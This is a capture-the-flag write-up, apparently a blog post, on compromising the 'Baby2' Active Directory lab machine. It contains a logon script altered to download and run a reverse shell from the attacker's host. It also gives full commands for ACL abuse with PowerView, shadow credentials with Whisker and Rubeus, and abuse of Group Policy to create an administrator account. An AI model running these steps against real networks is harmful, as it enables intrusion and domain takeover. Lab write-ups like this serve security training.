Baby2 is a Medium difficult machine where I began with a Nmap scan revealing several open ports on the target, including SMB and LDAP. Access to SMB shares with a null password provided read/write permissions on the homes share, revealing user information and a VBS logon script in the SYSVOL share. The script was modified to execute a reverse shell, leading to access as the user Amelia Griffiths. Using BloodHound and PowerView, it was discovered that Amelia had WriteDACL rights over the GPOADM account. This privilege was used to create shadow credentials, gain a TGT, and ultimately compromise the domain by creating a new admin user, allowing full control of the system.

Enumeration

The Nmap scan shows the following ports.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
PORT      STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws

I can enumerate shares with username and null password. I have READ and WRITE permission on homes share.
netexec smb 10.10.84.43 -u 'sz' -p '' --shares

Inside apps share I found a shortcut file that shows that there is a scripts folder inside SYSVOL where it’s connected to.

On homes share there is a list of users.

After brute forcing using I found 2 domain creds. And user library has both READ & WRITE access on SYSVOL share.


Inside SYSVOL I found a VBS logon script.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
Sub MapNetworkShare(sharePath, driveLetter)
Dim objNetwork
Set objNetwork = CreateObject("WScript.Network")

' Check if the drive is already mapped
Dim mappedDrives
Set mappedDrives = objNetwork.EnumNetworkDrives
Dim isMapped
isMapped = False
For i = 0 To mappedDrives.Count - 1 Step 2
If UCase(mappedDrives.Item(i)) = UCase(driveLetter & ":") Then
isMapped = True
Exit For
End If
Next

If isMapped Then
objNetwork.RemoveNetworkDrive driveLetter & ":", True, True
End If

objNetwork.MapNetworkDrive driveLetter & ":", sharePath

If Err.Number = 0 Then
WScript.Echo "Mapped " & driveLetter & ": to " & sharePath
Else
WScript.Echo "Failed to map " & driveLetter & ": " & Err.Description
End If

Set objNetwork = Nothing
End Sub

MapNetworkShare "\\dc.baby2.vl\apps", "V"
MapNetworkShare "\\dc.baby2.vl\docs", "L"

VBS Phishing

I have changed the script so that when someone login and the script executes, it will download my reverse-shell script and execute it. And then replaced the script with the original one.

1
2
3
4
5
set shell = CreateObject("WScript.Shell")
shell.Run("powershell -w hidden -ep bypass -c IEX(New-Object System.Net.WebClient).DownloadString('http://10.8.2.110/rev.ps1');")

MapNetworkShare "\\dc.baby2.vl\apps", "V"
MapNetworkShare "\\dc.baby2.vl\docs", "L"

After the script executed I got the reverse shell as Amelia Griffiths

Write DACL

Amelia is in some non-default Windows groups.

I ran Bloodhound to enumerate domain and ACL and Amelia is a member of Legacy and has WriteDACL on GPOADM. and GPOADM use have GenericAll to Domain Policy.
bloodhound-python -u 'Carl.Moore' -p 'Carl.Moore' -ns 10.10.73.219 -d baby2.vl -c all --auth-method auto --zip --dns-tcp

I used PowerView to make Amelia the owner of GPOADM and then give Amelia GenericAll the rights over GPOADM.

Set-DomainObjectOwner -Identity gpoadm -OwnerIdentity amelia.griffiths
Add-DomainObjectAcl -TargetIdentity "gpoadm" -PrincipalIdentity Amelia.Griffiths -Rights All

To confirm the change I used the following command.
get-aduser gpoadm | ForEach-Object {Get-ACL "AD:\$($_.DistinguishedName)" | Select-Object -ExpandProperty Owner}

Shadow Credentials

Now using the rights I can create shadow credentials.

.\Whisker.exe add /target:gpoadm /domain:baby2.vl /dc:dc.baby2.vl /path:C:\Users\Public\cert.pfx /password:Password

Using the certificate I can now generate a TGT using Rubeus.
Rubeus.exe asktgt /user:gpoadm /certificate:C:\Users\Public\cert.pfx /password:"Password" /domain:baby2.vl /dc:dc.baby2.vl /getcredentials /show

Using GPOADM NTLM hash I can create a scheduled task where it will create a new user John with Administrator privilege. pygpoabuse needs a GPO ID to abuse it.
python3 pygpoabuse.py baby2.vl/GPOADM -hashes :51B4E7AEE2FBDD4E36F2381115C8FE7A -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9" -f -dc-ip 10.10.73.219

Note: In Powershell Get-GPO -all also get all the GPO IDs.

To make the process faster and apply the GPO update.
gpudate /force

Now I can log in as John and get the root flag.

Password Reset

Alternatively, I could change the password of the user which is not OFFSEC-friendly.

First I can give group legacy GenericALL permission.
Add-DomainObjectAcl -TargetIdentity "GPOADM" -PrincipalIdentity legacy -Domain baby2.vl -Rights All -Verbose

Next, reset and give a new password to the GPOADM user.
Set-ADAccountPassword -Identity 'CN=GPOADM,OU=GPO-MANAGEMENT,DC=BABY2,DC=VL' -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Password" -Force)

Using the new password I can create a scheduled task where it will create a new user with administrator privileges.
python3 pygpoabuse.py -user 'baby2.vl/gpoadm:Password' -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9" -f -dc-ip 10.10.73.219